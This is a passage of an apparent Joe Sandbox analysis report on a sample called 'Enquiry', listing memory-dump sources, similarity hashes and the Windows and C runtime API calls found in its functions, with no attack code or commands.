                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$MessageSend
                            • String ID:
                            • API String ID: 1871949834-0
                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                            • SendMessageW.USER32 ref: 00471AE3
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 3611059338-0
                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DestroyWindow$DeleteObject$IconMove
                            • String ID:
                            • API String ID: 1640429340-0
                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcslen.LIBCMT ref: 004438CD
                            • _wcslen.LIBCMT ref: 004438E6
                            • _wcstok.LIBCMT ref: 004438F8
                            • _wcslen.LIBCMT ref: 0044390C
                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                            • _wcstok.LIBCMT ref: 00443931
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                            • String ID:
                            • API String ID: 3632110297-0
                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteMenuObject$IconWindow
                            • String ID:
                            • API String ID: 752480666-0
                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                            APIs
                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                            APIs
                            • SendMessageW.USER32 ref: 004555C7
                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                            • String ID:
                            • API String ID: 3691411573-0
                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                            • LineTo.GDI32(?,?,?), ref: 004472AC
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                            • LineTo.GDI32(?,?,?), ref: 004472C6
                            • EndPath.GDI32(?), ref: 004472D6
                            • StrokePath.GDI32(?), ref: 004472E4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                            • String ID:
                            • API String ID: 372113273-0
                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                            APIs
                            • GetDC.USER32(00000000), ref: 0044CC6D
                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                            APIs
                            • __getptd.LIBCMT ref: 0041708E
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __amsg_exit.LIBCMT ref: 004170AE
                            • __lock.LIBCMT ref: 004170BE
                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                            • _free.LIBCMT ref: 004170EE
                            • InterlockedIncrement.KERNEL32(03232CD0), ref: 00417106
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 3470314060-0
                            • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                            • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
